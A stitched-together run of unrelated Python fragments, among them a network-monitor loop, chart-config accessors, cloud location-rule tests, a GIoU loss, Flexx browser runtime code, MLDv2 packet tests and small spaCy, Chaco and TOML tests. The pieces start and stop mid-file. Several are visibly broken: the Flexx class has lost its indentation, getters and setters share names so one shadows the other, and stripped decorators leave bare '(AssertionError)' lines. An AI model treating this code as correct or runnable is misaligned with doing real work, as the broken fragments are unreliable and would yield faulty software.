        jobs, and refresh Prometheus metadata. Never returns."""
        while True:
            (events, faucet_event, remove_list) = self.prom.runtime_callable(self.handle_rabbit)
            if remove_list:
                for endpoint_name in remove_list:
                    if (endpoint_name in self.sdnc.endpoints):
                        del self.sdnc.endpoints[endpoint_name]
            if faucet_event:
                self.prom.runtime_callable(partial(self.sdnc.check_endpoints, faucet_event))
            events += self.prom.runtime_callable(monitor.schedule_mirroring)
            (found_work, schedule_func) = self.prom.runtime_callable(partial(self.get_q_item, self.job_queue))
            if (found_work and callable(schedule_func)):
                events += self.prom.runtime_callable(schedule_func)
            if events:
                self.prom.update_endpoint_metadata(self.sdnc.endpoints)
            time.sleep(1)

    # NOTE(review): defined without `self`, yet invoked via
    # `partial(self.get_q_item, queue)`, which also binds the instance.
    # This looks like a missing @staticmethod decorator (possibly stripped
    # from this source) — confirm against upstream before relying on it.
    def get_q_item(q):
        """Non-blocking queue pop: (True, item) or (False, None) when empty."""
        try:
            item = q.get_nowait()
            q.task_done()
            return (True, item)
        except queue.Empty:
            pass
        return (False, None)
class OptionPlotoptionsArcdiagramSonificationDefaultinstrumentoptionsMappingLowpassFrequency(Options):
    """Config accessors for the arcdiagram sonification lowpass-frequency mapping.

    NOTE(review): every name below is defined twice — a getter-style form
    (`_config_get`) followed by a setter-style form (`_config`). Without
    @property / @<name>.setter decorators the second definition shadows the
    first, so only the setter variants are live at runtime. Decorators were
    likely stripped from this source; confirm against the upstream library
    before relying on the getters.
    """

    def mapFunction(self):
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class LocationRulesEngineTest(ForsetiTestCase):
    """Unit tests for the location scanner rules engine."""

    def setUp(self):
        location_rules_engine.LOGGER = mock.MagicMock()

    @staticmethod
    def _rule(**fields):
        """Render the shared rule template with the given fields."""
        return rule_tmpl.format(**fields)

    @staticmethod
    def _find(rule, resource):
        """Build a fresh engine from *rule* and collect violations on *resource*."""
        return list(get_rules_engine_with_rule(rule).find_violations(resource))

    def test_build_rule_book_from_local_yaml_file(self):
        rule = self._rule(mode='whitelist', type='bucket', ids=['*'], locations=['eu*'])
        engine = get_rules_engine_with_rule(rule)
        self.assertEqual(1, len(engine.rule_book.resource_to_rules))

    def test_find_violations_bucket_whitelist_no_violations(self):
        rule = self._rule(mode='whitelist', type='bucket', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.BUCKET), [])

    def test_find_violations_bucket_whitelist_has_violations(self):
        rule = self._rule(mode='whitelist', type='bucket', ids=['*'], locations=['us*'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_bucket_blacklist_no_violations(self):
        rule = self._rule(mode='blacklist', type='bucket', ids=['*'], locations=['us*'])
        self.assertEqual(self._find(rule, data.BUCKET), [])

    def test_find_violations_bucket_blacklist_has_violations(self):
        rule = self._rule(mode='blacklist', type='bucket', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_dataset(self):
        rule = self._rule(mode='blacklist', type='dataset', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.DATASET), data.build_violations(data.DATASET))

    def test_find_violations_cloud_sql_instance(self):
        rule = self._rule(mode='blacklist', type='cloudsqlinstance', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.CLOUD_SQL_INSTANCE), data.build_violations(data.CLOUD_SQL_INSTANCE))

    def test_find_violations_cluster(self):
        rule = self._rule(mode='blacklist', type='kubernetes_cluster', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.CLUSTER), data.build_violations(data.CLUSTER))

    def test_find_violations_gce_instance(self):
        rule = self._rule(mode='blacklist', type='instance', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.GCE_INSTANCE), data.build_violations(data.GCE_INSTANCE))

    def test_find_violations_exact(self):
        # Exact location names (no wildcard) must also match.
        rule = self._rule(mode='blacklist', type='bucket', ids=['*'], locations=['europe-west1'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_multiple_locations(self):
        rule = self._rule(mode='blacklist', type='bucket', ids=['*'], locations=['us*', 'eu*'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_specific_id(self):
        # A rule listing the bucket's id (among others) still applies.
        rule = self._rule(mode='blacklist', type='bucket', ids=['dne', 'p1-bucket1'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_applies_all_resources(self):
        rule = self._rule(mode='blacklist', type='*', ids=['*'], locations=['eu*'])
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_backwards_compatibility(self):
        rule = "\nrules:\n  - name: Location test rule\n    mode: blacklist\n    resource:\n      - type: 'organization'\n        resource_ids: ['234']\n    applies_to: ['bucket']\n    locations: ['eu*']\n"
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))

    def test_find_violations_project(self):
        rule = "\nrules:\n  - name: Location test rule\n    mode: blacklist\n    resource:\n      - type: 'project'\n        resource_ids: ['p1']\n    applies_to: ['bucket']\n    locations: ['eu*']\n"
        self.assertEqual(self._find(rule, data.BUCKET), data.build_violations(data.BUCKET))
def giou_loss(boxes1: torch.Tensor, boxes2: torch.Tensor, reduction: str='none', eps: float=1e-07) -> torch.Tensor:
    """Generalized IoU loss between paired axis-aligned boxes.

    Boxes are given as (..., 4) tensors in (x1, y1, x2, y2) form with
    x2 >= x1 and y2 >= y1. The loss is ``1 - GIoU`` per box pair.

    Args:
        boxes1, boxes2: paired boxes of matching shape.
        reduction: 'none' (default, elementwise), 'mean', or 'sum'.
        eps: small constant guarding division by zero.
    """
    x1, y1, x2, y2 = boxes1.unbind(dim=-1)
    x1g, y1g, x2g, y2g = boxes2.unbind(dim=-1)
    assert (x2 >= x1).all(), 'bad box: x1 larger than x2'
    assert (y2 >= y1).all(), 'bad box: y1 larger than y2'
    # Intersection rectangle corners.
    ix1 = torch.max(x1, x1g)
    iy1 = torch.max(y1, y1g)
    ix2 = torch.min(x2, x2g)
    iy2 = torch.min(y2, y2g)
    # Intersection area: zero wherever the boxes do not overlap.
    overlap = (iy2 > iy1) & (ix2 > ix1)
    inter = torch.zeros_like(x1)
    inter[overlap] = (ix2[overlap] - ix1[overlap]) * (iy2[overlap] - iy1[overlap])
    union = (x2 - x1) * (y2 - y1) + (x2g - x1g) * (y2g - y1g) - inter
    iou = inter / (union + eps)
    # Smallest axis-aligned box enclosing both inputs.
    ex1 = torch.min(x1, x1g)
    ey1 = torch.min(y1, y1g)
    ex2 = torch.max(x2, x2g)
    ey2 = torch.max(y2, y2g)
    enclose_area = (ex2 - ex1) * (ey2 - ey1)
    # GIoU = IoU minus the enclosing-box penalty.
    giou = iou - (enclose_area - union) / (enclose_area + eps)
    loss = 1 - giou
    if reduction == 'mean':
        # Guard the empty case so autograd still sees a connected graph.
        loss = loss.mean() if loss.numel() > 0 else 0.0 * loss.sum()
    elif reduction == 'sum':
        loss = loss.sum()
    return loss
class RecordEventListenerTestCase(unittest.TestCase):
    """Tests event dispatch to handlers registered on RecordEventListener."""

    def test_send(self):
        seen = []
        record = object()

        def on_e(record, n=1):
            seen.append(n)

        listener = quality_filter.RecordEventListener()
        listener.register_handler('e', on_e)
        # Default keyword argument flows through.
        listener('e', record)
        self.assertEqual(seen, [1])
        # Explicit keyword argument is forwarded to the handler.
        listener('e', record, n=5)
        self.assertEqual(seen, [1, 5])
        # Events with no registered handler are silently ignored.
        listener('other', record, n=5)
        self.assertEqual(seen, [1, 5])
def upsert_privacy_experiences_after_config_update(db: Session, experience_config: PrivacyExperienceConfig, regions: List[PrivacyNoticeRegion]) -> Tuple[(List[PrivacyNoticeRegion], List[PrivacyNoticeRegion])]:
    """Sync PrivacyExperience rows so *regions* becomes the exact region set
    linked to *experience_config*.

    Returns a tuple of (regions newly linked to this config, regions unlinked
    from it).
    """
    linked_regions: List[PrivacyNoticeRegion] = []
    current_regions: List[PrivacyNoticeRegion] = experience_config.regions
    # Regions currently linked to the config but absent from the requested
    # list; compared by enum value to be robust across enum instances.
    removed_regions: List[PrivacyNoticeRegion] = [PrivacyNoticeRegion(reg) for reg in {reg.value for reg in current_regions}.difference({reg.value for reg in regions})]
    unlinked_regions: List[PrivacyNoticeRegion] = remove_config_from_matched_experiences(db, experience_config, removed_regions)
    for region in regions:
        # At most one experience exists per (region, component); reuse it.
        existing_experience: Optional[PrivacyExperience] = PrivacyExperience.get_experience_by_region_and_component(db=db, region=region, component=experience_config.component)
        data = {'component': experience_config.component, 'region': region, 'experience_config_id': experience_config.id}
        if existing_experience:
            # Only count the region as newly linked when the config actually changes.
            if (existing_experience.experience_config_id != experience_config.id):
                linked_regions.append(region)
            existing_experience.update(db, data=data)
        else:
            PrivacyExperience.create(db, data=data)
            linked_regions.append(region)
    return (linked_regions, unlinked_regions)
class VenueMessageFactory(MessageFactory):
    """Sends Telegram venue messages and verifies their EFB location conversion."""

    async def send_message(self, client: TelegramClient, chat_id: int, target: Message=None) -> Message:
        """Send a venue at (0.0, 0.0) with a randomized address, optionally replying to *target*."""
        return (await client.send_message(chat_id, file=InputMediaVenue(InputGeoPoint(0.0, 0.0), 'Location name', f'Address {uuid4()}', '', '', ''), reply_to=target))

    def compare_message(self, tg_msg: Message, efb_msg: EFBMessage) -> None:
        """Assert the EFB message mirrors the Telegram venue (type, coordinates, text)."""
        assert (efb_msg.type == MsgType.Location)
        assert isinstance(efb_msg.attributes, LocationAttribute)
        # Coordinates only need to agree to ~1e-3.
        assert (tg_msg.geo.lat == approx(efb_msg.attributes.latitude, abs=0.001))
        assert (tg_msg.geo.long == approx(efb_msg.attributes.longitude, abs=0.001))
        assert isinstance(tg_msg.media, MessageMediaVenue)
        # Venue title and address must both be carried into the message text.
        assert (tg_msg.media.title in efb_msg.text)
        assert (tg_msg.media.address in efb_msg.text)
class Flexx():
def __init__(self):
if window.flexx.init:
raise RuntimeError('Should not create global Flexx object more than once.')
self.is_notebook = False
self.is_exported = False
for key in window.flexx.keys():
self[key] = window.flexx[key]
self.need_main_widget = True
self._session_count = 0
self.sessions = {}
window.addEventListener('load', self.init, False)
window.addEventListener('unload', self.exit, False)
def init(self):
self.asset_node = window.document.createElement('div')
self.asset_node.id = 'Flexx asset container'
window.document.body.appendChild(self.asset_node)
if self.is_exported:
if self.is_notebook:
print('Flexx: I am in an exported notebook!')
else:
print('Flexx: I am in an exported app!')
self.run_exported_app()
else:
print('Flexx: Initializing')
if (not self.is_notebook):
self._remove_querystring()
self.init_logging()
def _remove_querystring(self):
try:
window.history.replaceState(window.history.state, '', window.location.pathname)
except Exception:
pass
def exit(self):
for session in self.sessions.values():
session.exit()
def spin(self, n=1):
RawJS("\n var el = window.document.getElementById('flexx-spinner');\n if (el) {\n if (n === null) { // Hide the spinner overlay, now or in a bit\n if (el.children[0].innerHTML.indexOf('limited') > 0) {\n setTimeout(function() { el.style.display = 'none'; }, 2000);\n } else {\n el.style.display = 'none';\n }\n } else {\n for (var i=0; i<n; i++) { el.children[1].innerHTML += '■'; }\n }\n }\n ")
    def init_logging(self):
        """Monkey-patch the browser console so log/info/warn/error are both
        shown locally and forwarded to all connected server sessions.

        Idempotent: if ``console.ori_log`` already exists the console has been
        patched before and we return immediately.
        """
        if window.console.ori_log:
            return
        # Keep the original console functions reachable under ori_* names.
        window.console.ori_log = window.console.log
        window.console.ori_info = (window.console.info or window.console.log)
        window.console.ori_warn = (window.console.warn or window.console.log)
        window.console.ori_error = (window.console.error or window.console.log)
        def log(msg):
            window.console.ori_log(msg)
            for session in self.sessions.values():
                session.send_command('PRINT', str(msg))
        def info(msg):
            window.console.ori_info(msg)
            for session in self.sessions.values():
                session.send_command('INFO', str(msg))
        def warn(msg):
            window.console.ori_warn(msg)
            for session in self.sessions.values():
                session.send_command('WARN', str(msg))
        def error(msg):
            # Route explicit console.error calls through the same path as
            # uncaught window errors, building a minimal event-like object.
            evt = dict(message=str(msg), error=msg, preventDefault=(lambda : None))
            on_error(evt)
        def on_error(evt):
            self._handle_error(evt)
        # Bind so that 'this' is correct when the browser invokes the handler.
        on_error = on_error.bind(self)
        window.console.log = log
        window.console.info = info
        window.console.warn = warn
        window.console.error = error
        # Also intercept uncaught errors raised anywhere on the page.
        window.addEventListener('error', on_error, False)
    def create_session(self, app_name, session_id, ws_url):
        """Create a JsSession for ``app_name`` and register it.

        If the page was reached via the browser back/forward cache
        (navigation type 2) we force a reload instead, because the cached
        page's websocket is stale. Sessions are exposed as ``self.s1``,
        ``self.s2``, ... for console convenience (note: ``'s' + count`` is
        JS string concatenation after PScript transpilation).
        """
        if (window.performance and (window.performance.navigation.type == 2)):
            window.location.reload()
        elif self._validate_browser_capabilities():
            s = JsSession(app_name, session_id, ws_url)
            self._session_count += 1
            self[('s' + self._session_count)] = s
            self.sessions[session_id] = s
    def _validate_browser_capabilities(self):
        """Return True if the browser can run Flexx (WebSocket + Object.keys).

        Unsupported browsers get a message in the spinner overlay (or an
        alert) and False is returned; browsers with partial support (no
        ``''.startsWith``, probably IE) get a warning but still return True.
        """
        RawJS("\n        var el = window.document.getElementById('flexx-spinner');\n        if (    window.WebSocket === undefined || // IE10+\n                Object.keys === undefined || // IE9+\n                false\n           ) {\n            var msg = ('Flexx does not support this browser.<br>' +\n                       'Try Firefox, Chrome, ' +\n                       'or a more recent version of the current browser.');\n            if (el) { el.children[0].innerHTML = msg; }\n            else { window.alert(msg); }\n            return false;\n        } else if (''.startsWith === undefined) { // probably IE\n            var msg = ('Flexx support for this browser is limited.<br>' +\n                       'Consider using Firefox, Chrome, or maybe Edge.');\n            if (el) { el.children[0].innerHTML = msg; }\n            return true;\n        } else {\n            return true;\n        }\n        ")
    def _handle_error(self, evt):
        """Handle an uncaught browser error event.

        Grooms the JS stack trace (drops the error-raising frames, truncates
        at the event-loop internals, removes flx_action wrapper frames and the
        session-id noise), prints the full message via the original console
        error, and forwards the short message to all server sessions.
        """
        msg = short_msg = evt.message
        if (not window.evt):
            # Stash the event globally for interactive debugging.
            window.evt = evt
        if (evt.error and evt.error.stack):
            stack = evt.error.stack.splitlines()
            session_needle = ('?session_id=' + self.id)
            for i in range(len(stack)):
                # NOTE(review): replace('', ' ') only prepends a space to each
                # line in JS -- possibly a mangled needle from the original
                # source; confirm against upstream before changing.
                stack[i] = stack[i].replace('', ' ').replace(session_needle, '')
            # Drop the frame(s) that merely raised/wrapped the error.
            for x in [evt.message, '_pyfunc_op_error']:
                if (x in stack[0]):
                    stack.pop(0)
            # Truncate the trace at the Flexx event-loop machinery.
            for i in range(len(stack)):
                for x in ['_process_actions', '_process_reactions', '_process_calls']:
                    if (('Loop.' + x) in stack[i]):
                        stack = stack[:i]
                        break
            # Remove action-wrapper frames (iterate in reverse so pops are safe).
            for i in reversed(range(len(stack))):
                for x in ['flx_action ']:
                    if (stack[i] and stack[i].count(x)):
                        stack.pop(i)
            msg += ('\n' + '\n'.join(stack))
        elif (evt.message and evt.lineno):
            # No stack available: at least report file and line number.
            msg += ('\nIn %s:%i' % (evt.filename, evt.lineno))
        evt.preventDefault()
        window.console.ori_error(msg)
        for session in self.sessions.values():
            session.send_command('ERROR', short_msg)
class UserRelated(BaseObject):
    """Holder for the per-user related-record counters returned by the API
    (tickets, subscriptions, forum/topic activity, votes)."""

    def __init__(self, api=None, assigned_tickets=None, ccd_tickets=None, entry_subscriptions=None, forum_subscriptions=None, organization_subscriptions=None, requested_tickets=None, subscriptions=None, topic_comments=None, topics=None, votes=None, **kwargs):
        self.api = api
        # Assign the declared fields in one pass.
        declared = (
            ('assigned_tickets', assigned_tickets),
            ('ccd_tickets', ccd_tickets),
            ('entry_subscriptions', entry_subscriptions),
            ('forum_subscriptions', forum_subscriptions),
            ('organization_subscriptions', organization_subscriptions),
            ('requested_tickets', requested_tickets),
            ('subscriptions', subscriptions),
            ('topic_comments', topic_comments),
            ('topics', topics),
            ('votes', votes),
        )
        for attr, value in declared:
            setattr(self, attr, value)
        # Any extra keyword arguments become attributes verbatim.
        for key, value in kwargs.items():
            setattr(self, key, value)
        # Fields that were never supplied should not be tracked as dirty.
        for key in self.to_dict():
            if getattr(self, key) is None:
                try:
                    self._dirty_attributes.remove(key)
                except KeyError:
                    continue
class Test_mldv2_query(unittest.TestCase):
    """Tests for icmpv6.mldv2_query (MLDv2 Multicast Listener Query, RFC 3810):
    construction, parse/serialize round-trips, string form, and JSON form."""
    # Expected ICMPv6 header fields for an MLDv2 query message.
    type_ = 130
    code = 0
    csum = 46500
    maxresp = 10000
    address = 'ff08::1'
    s_flg = 0
    qrv = 2
    # s_flg and qrv share one octet on the wire: Resv|S|QRV.
    s_qrv = ((s_flg << 3) | qrv)
    qqic = 10
    num = 0
    srcs = []
    mld = icmpv6.mldv2_query(maxresp, address, s_flg, qrv, qqic, num, srcs)
    # Wire image matching the values above (query with no source addresses).
    buf = (((b"\x82\x00\xb5\xa4'\x10\x00\x00" + b'\xff\x08\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\x02\n\x00\x00')
    def setUp(self):
        pass
    def setUp_with_srcs(self):
        """Switch the fixtures to a query that carries two source addresses."""
        self.num = 2
        self.srcs = ['ff80::1', 'ff80::2']
        self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
        # Same wire image as `buf`, with num=2 and the two 16-byte sources appended.
        self.buf = (((((((b"\x82\x00\xb5\xa4'\x10\x00\x00" + b'\xff\x08\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\x02\n\x00\x02') + b'\xff\x80\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\xff\x80\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x02')
    def tearDown(self):
        pass
    def find_protocol(self, pkt, name):
        """Return the first protocol in `pkt` whose name matches, else None."""
        for p in pkt.protocols:
            if (p.protocol_name == name):
                return p
    def test_init(self):
        """Constructor must store every field unchanged."""
        eq_(self.mld.maxresp, self.maxresp)
        eq_(self.mld.address, self.address)
        eq_(self.mld.s_flg, self.s_flg)
        eq_(self.mld.qrv, self.qrv)
        eq_(self.mld.qqic, self.qqic)
        eq_(self.mld.num, self.num)
        eq_(self.mld.srcs, self.srcs)
    def test_init_with_srcs(self):
        self.setUp_with_srcs()
        self.test_init()
    def test_parser(self):
        """Parsing the wire image must reproduce every fixture field."""
        (msg, n, _) = icmpv6.icmpv6.parser(self.buf)
        eq_(msg.type_, self.type_)
        eq_(msg.code, self.code)
        eq_(msg.csum, self.csum)
        eq_(msg.data.maxresp, self.maxresp)
        eq_(msg.data.address, self.address)
        eq_(msg.data.s_flg, self.s_flg)
        eq_(msg.data.qrv, self.qrv)
        eq_(msg.data.qqic, self.qqic)
        eq_(msg.data.num, self.num)
        eq_(msg.data.srcs, self.srcs)
        # No payload remains after the query body.
        eq_(n, None)
    def test_parser_with_srcs(self):
        self.setUp_with_srcs()
        self.test_parser()
    def test_serialize(self):
        """Serializing must emit the expected header, checksum and body fields."""
        src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
        dst_ipv6 = '3ffe:501:0:1001::2'
        prev = ipv6(6, 0, 0, len(self.buf), 64, 255, src_ipv6, dst_ipv6)
        mld_csum = icmpv6_csum(prev, self.buf)
        icmp = icmpv6.icmpv6(self.type_, self.code, 0, self.mld)
        buf = icmp.serialize(bytearray(), prev)
        (type_, code, csum) = struct.unpack_from(icmp._PACK_STR, six.binary_type(buf))
        (maxresp, address, s_qrv, qqic, num) = struct.unpack_from(self.mld._PACK_STR, six.binary_type(buf), icmp._MIN_LEN)
        eq_(type_, self.type_)
        eq_(code, self.code)
        eq_(csum, mld_csum)
        eq_(maxresp, self.maxresp)
        eq_(address, addrconv.ipv6.text_to_bin(self.address))
        # Unpack the shared S-flag/QRV octet.
        s_flg = ((s_qrv >> 3) & 1)
        qrv = (s_qrv & 7)
        eq_(s_flg, self.s_flg)
        eq_(qrv, self.qrv)
        eq_(qqic, self.qqic)
        eq_(num, self.num)
    def test_serialize_with_srcs(self):
        """Like test_serialize, but also checks the appended source addresses."""
        self.setUp_with_srcs()
        src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
        dst_ipv6 = '3ffe:501:0:1001::2'
        prev = ipv6(6, 0, 0, len(self.buf), 64, 255, src_ipv6, dst_ipv6)
        mld_csum = icmpv6_csum(prev, self.buf)
        icmp = icmpv6.icmpv6(self.type_, self.code, 0, self.mld)
        buf = icmp.serialize(bytearray(), prev)
        (type_, code, csum) = struct.unpack_from(icmp._PACK_STR, six.binary_type(buf))
        (maxresp, address, s_qrv, qqic, num) = struct.unpack_from(self.mld._PACK_STR, six.binary_type(buf), icmp._MIN_LEN)
        (addr1, addr2) = struct.unpack_from('!16s16s', six.binary_type(buf), (icmp._MIN_LEN + self.mld._MIN_LEN))
        eq_(type_, self.type_)
        eq_(code, self.code)
        eq_(csum, mld_csum)
        eq_(maxresp, self.maxresp)
        eq_(address, addrconv.ipv6.text_to_bin(self.address))
        s_flg = ((s_qrv >> 3) & 1)
        qrv = (s_qrv & 7)
        eq_(s_flg, self.s_flg)
        eq_(qrv, self.qrv)
        eq_(qqic, self.qqic)
        eq_(num, self.num)
        eq_(addr1, addrconv.ipv6.text_to_bin(self.srcs[0]))
        eq_(addr2, addrconv.ipv6.text_to_bin(self.srcs[1]))
    def _build_mldv2_query(self):
        """Build an ethernet/ipv6/icmpv6 packet carrying the fixture query."""
        e = ethernet(ethertype=ether.ETH_TYPE_IPV6)
        i = ipv6(nxt=inet.IPPROTO_ICMPV6)
        ic = icmpv6.icmpv6(type_=icmpv6.MLD_LISTENER_QUERY, data=self.mld)
        p = ((e / i) / ic)
        return p
    def test_build_mldv2_query(self):
        p = self._build_mldv2_query()
        e = self.find_protocol(p, 'ethernet')
        ok_(e)
        eq_(e.ethertype, ether.ETH_TYPE_IPV6)
        i = self.find_protocol(p, 'ipv6')
        ok_(i)
        eq_(i.nxt, inet.IPPROTO_ICMPV6)
        ic = self.find_protocol(p, 'icmpv6')
        ok_(ic)
        eq_(ic.type_, icmpv6.MLD_LISTENER_QUERY)
        eq_(ic.data.maxresp, self.maxresp)
        eq_(ic.data.address, self.address)
        eq_(ic.data.s_flg, self.s_flg)
        eq_(ic.data.qrv, self.qrv)
        eq_(ic.data.num, self.num)
        eq_(ic.data.srcs, self.srcs)
    def test_build_mldv2_query_with_srcs(self):
        self.setUp_with_srcs()
        self.test_build_mldv2_query()
    def test_to_string(self):
        """str()/repr() must match the canonical 'name(field=value,...)' form."""
        ic = icmpv6.icmpv6(self.type_, self.code, self.csum, self.mld)
        mld_values = {'maxresp': self.maxresp, 'address': self.address, 's_flg': self.s_flg, 'qrv': self.qrv, 'qqic': self.qqic, 'num': self.num, 'srcs': self.srcs}
        # Build the expected strings from the objects' own members so the
        # field order matches inspect.getmembers (alphabetical).
        _mld_str = ','.join([('%s=%s' % (k, repr(mld_values[k]))) for (k, v) in inspect.getmembers(self.mld) if (k in mld_values)])
        mld_str = ('%s(%s)' % (icmpv6.mldv2_query.__name__, _mld_str))
        icmp_values = {'type_': repr(self.type_), 'code': repr(self.code), 'csum': repr(self.csum), 'data': mld_str}
        _ic_str = ','.join([('%s=%s' % (k, icmp_values[k])) for (k, v) in inspect.getmembers(ic) if (k in icmp_values)])
        ic_str = ('%s(%s)' % (icmpv6.icmpv6.__name__, _ic_str))
        eq_(str(ic), ic_str)
        eq_(repr(ic), ic_str)
    def test_to_string_with_srcs(self):
        self.setUp_with_srcs()
        self.test_to_string()
    # NOTE(review): the bare '(AssertionError)' below looks like a stripped
    # '@raises(AssertionError)' nose decorator -- confirm against upstream.
    # As written it is a no-op expression and the test expects test_parser
    # to fail internally.
    (AssertionError)
    def test_num_larger_than_srcs(self):
        """num > len(srcs) must be rejected (expected to raise AssertionError)."""
        self.srcs = ['ff80::1', 'ff80::2', 'ff80::3']
        self.num = (len(self.srcs) + 1)
        self.buf = struct.pack(icmpv6.mldv2_query._PACK_STR, self.maxresp, addrconv.ipv6.text_to_bin(self.address), self.s_qrv, self.qqic, self.num)
        for src in self.srcs:
            self.buf += struct.pack('16s', addrconv.ipv6.text_to_bin(src))
        self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
        self.test_parser()
    # NOTE(review): likely another stripped '@raises(AssertionError)' decorator.
    (AssertionError)
    def test_num_smaller_than_srcs(self):
        """num < len(srcs) must be rejected (expected to raise AssertionError)."""
        self.srcs = ['ff80::1', 'ff80::2', 'ff80::3']
        self.num = (len(self.srcs) - 1)
        self.buf = struct.pack(icmpv6.mldv2_query._PACK_STR, self.maxresp, addrconv.ipv6.text_to_bin(self.address), self.s_qrv, self.qqic, self.num)
        for src in self.srcs:
            self.buf += struct.pack('16s', addrconv.ipv6.text_to_bin(src))
        self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
        self.test_parser()
    def test_default_args(self):
        """A default-constructed query serializes to all-zero fields with QRV=2."""
        prev = ipv6(nxt=inet.IPPROTO_ICMPV6)
        ic = icmpv6.icmpv6(type_=icmpv6.MLD_LISTENER_QUERY, data=icmpv6.mldv2_query())
        prev.serialize(ic, None)
        buf = ic.serialize(bytearray(), prev)
        res = struct.unpack(icmpv6.icmpv6._PACK_STR, six.binary_type(buf[:4]))
        eq_(res[0], icmpv6.MLD_LISTENER_QUERY)
        eq_(res[1], 0)
        eq_(res[2], icmpv6_csum(prev, buf))
        res = struct.unpack(icmpv6.mldv2_query._PACK_STR, six.binary_type(buf[4:]))
        eq_(res[0], 0)
        eq_(res[1], addrconv.ipv6.text_to_bin('::'))
        eq_(res[2], 2)
        eq_(res[3], 0)
        eq_(res[4], 0)
        # Supplying only srcs must set num automatically and append the sources.
        srcs = ['ff80::1', 'ff80::2', 'ff80::3']
        que = icmpv6.mldv2_query(srcs=srcs)
        buf = que.serialize()
        res = struct.unpack_from(icmpv6.mldv2_query._PACK_STR, six.binary_type(buf))
        eq_(res[0], 0)
        eq_(res[1], addrconv.ipv6.text_to_bin('::'))
        eq_(res[2], 2)
        eq_(res[3], 0)
        eq_(res[4], len(srcs))
        (src1, src2, src3) = struct.unpack_from('16s16s16s', six.binary_type(buf), icmpv6.mldv2_query._MIN_LEN)
        eq_(src1, addrconv.ipv6.text_to_bin(srcs[0]))
        eq_(src2, addrconv.ipv6.text_to_bin(srcs[1]))
        eq_(src3, addrconv.ipv6.text_to_bin(srcs[2]))
    def test_json(self):
        """to_jsondict/from_jsondict must round-trip the query."""
        jsondict = self.mld.to_jsondict()
        mld = icmpv6.mldv2_query.from_jsondict(jsondict['mldv2_query'])
        eq_(str(self.mld), str(mld))
    def test_json_with_srcs(self):
        self.setUp_with_srcs()
        self.test_json()
def test_01_09_predictions(nlp):
    """The model must tag exactly one entity -- 'Apple' as ORG -- and leave the
    product-name tokens (5 and 6) untagged."""
    doc = nlp("Apple : le nouveau modele X Pro attendu pour l'ete.")
    entities = [(ent.text, ent.label_) for ent in doc.ents]
    assert entities == [('Apple', 'ORG')]
    # 'X' and 'Pro' must carry no entity type.
    assert doc[5].ent_type == 0
    assert doc[6].ent_type == 0
class AnimatedPlot(HasTraits):
    """A single animated line plot: `timer_tick` sweeps a growing window over
    the (x, y) data, bouncing the sweep direction at the boundaries."""

    # x_values may arrive as a raw array or as a Chaco ArrayDataSource.
    x_values = Any()
    y_values = Array()
    color = Str()
    plot = Instance(Component)

    def _plot_default(self):
        """Build the line plot and initialise the animation state.

        Returns the configured Chaco plot component.
        """
        # Normalise x_values to a plain array up front; the original code
        # duplicated the identical create_line_plot call in both branches.
        if isinstance(self.x_values, ArrayDataSource):
            self.x_values = self.x_values.get_data()[:]
        plot = create_line_plot((self.x_values, self.y_values), color=self.color,
                                bgcolor='white', add_grid=True, add_axis=True)
        plot.resizable = ''
        plot.bounds = [PLOT_SIZE, PLOT_SIZE]
        plot.unified_draw = True
        plot.tools.append(PanTool(plot, drag_button='right'))
        plot.tools.append(MoveTool(plot))
        plot.overlays.append(ZoomTool(plot, tool_mode='box', always_on=False))
        # Animation state: start halfway through, sweeping forward.
        self.numpoints = len(self.x_values)
        self.current_index = self.numpoints // 2
        self.increment = 2
        return plot

    def timer_tick(self):
        """Advance the visible window by `increment` points and redraw.

        Direction flips forward again below one third of the data and
        backward once the end is reached; the index is clamped to the data
        length.
        """
        if self.current_index <= (self.numpoints / 3):
            self.increment = 2
        elif self.current_index == self.numpoints:
            self.increment = -2
        self.current_index += self.increment
        if self.current_index > self.numpoints:
            self.current_index = self.numpoints
        self.plot.index.set_data(self.x_values[:self.current_index])
        self.plot.value.set_data(self.y_values[:self.current_index])
        self.plot.request_redraw()
class io_dict_toml_test_case(io_dict_test_case):
    """I/O tests for the TOML serializer: IODict.from_toml / to_toml against
    strings, files and URLs, valid and invalid."""

    def test_from_toml_with_valid_data(self):
        j = '\na = 1\n\n[b]\nc = 3\nd = 4\n'
        d = IODict.from_toml(j)
        self.assertTrue(isinstance(d, dict))
